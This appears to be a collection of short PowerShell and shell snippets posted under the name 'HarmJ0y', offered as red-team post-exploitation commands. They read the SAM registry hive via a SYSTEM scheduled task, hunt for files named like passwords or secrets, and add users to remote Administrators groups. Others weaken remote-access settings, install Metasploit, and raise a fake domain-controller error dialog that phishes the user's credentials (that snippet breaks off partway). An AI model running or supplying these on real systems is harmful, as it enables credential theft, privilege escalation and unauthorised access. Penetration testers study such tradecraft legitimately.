HarmJ0y

schtasks /create /tn GetSid /tr "powershell.exe -c '$k=Get-Item HKLM:\security\sam\domains\account;$v=Get-ItemProperty $k.pspath;New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$v.V[-24..-1],0)|Format-List *|Out-File c:\sid.txt'" /sc minute /ru System /MO 1 & choice /C X /T 60 /D X > nul & schtasks /delete /tn GetSid /f

HarmJ0y

# all files in sortable csv
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue | where {!$_.PSIsContainer} | select-object FullName, @{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}}, LastAccessTime, LastWriteTime, Length | export-csv -notypeinformation -path files.csv"

# grep for specific file types
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*.doc*','*.xls*','*.pdf')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv"

# grep for specific key words in file names
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*password*','*sensitive*','*secret*')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv"

HarmJ0y

# Add a domain user to a remote server local group, if your current user has admin over the remote machine
powershell -c ([ADSI]'WinNT://SERVER/Administrators,group').add('WinNT://DOMAIN/USER,user')

# Get all local groups on a remote server
powershell -c "([ADSI]'WinNT://SERVER,computer').psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($_.name)[0]}"

# Find members of the local Administrators group on a remote server
powershell -c "$([ADSI]'WinNT://SERVER/Administrators,group').psbase.Invoke('Members') | foreach { $_.GetType().InvokeMember('ADspath', 'GetProperty', $null, $_, $null).Replace('WinNT://', '') }"

# Enable the local Administrator account on a remote server

HarmJ0y

#Run winrm quickconfig defaults
echo Y | winrm quickconfig

#Run enable psremoting command with defaults
Enable-PSRemoting -force

# adjust local token filter policy
Set-ItemProperty –Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System –Name LocalAccountTokenFilterPolicy –Value 1 -Type DWord

#Enabled Trusted Hosts for Universial Access

HarmJ0y

#!/bin/bash

sudo apt-get install git
cd /tmp/
git clone https://github.com/darkoperator/MSF-Installer.git
cd MSF-Installer
sudo ./msf_install.sh -i
source ~/.bashrc
sudo chmod 0666 /usr/local/share/metasploit-framework/log/production.log

HarmJ0y

# Stolen/adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
#   POC from greg.foss[at]owasp.org

function prompt {

    Add-Type -AssemblyName Microsoft.VisualBasic
    [Microsoft.VisualBasic.Interaction]::MsgBox('Lost contact with the Domain Controller.', 'OKOnly,MsgBoxSetForeground,SystemModal,Critical', 'ERROR - 0xA801B720')

    $c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
    $credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")

HarmJ0y

$megs=1000;$w=New-Object IO.streamWriter $env:temp\data.dat;[char[]]$c='azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN0123456789-_';1..$megs|ForEach-Object{1..4|ForEach-Object{$r=$c|Get-Random -Count $c.Count;$s=-join $r;$w.Write($s*4kb);}};

HarmJ0y

# user to SID
(New-Object System.Security.Principal.NTAccount("DOMAIN","USER")).Translate([System.Security.Principal.SecurityIdentifier]).Value

# SID to user
(New-Object System.Security.Principal.SecurityIdentifier("SID")).Translate( [System.Security.Principal.NTAccount]).Value

HarmJ0y

HarmJ0y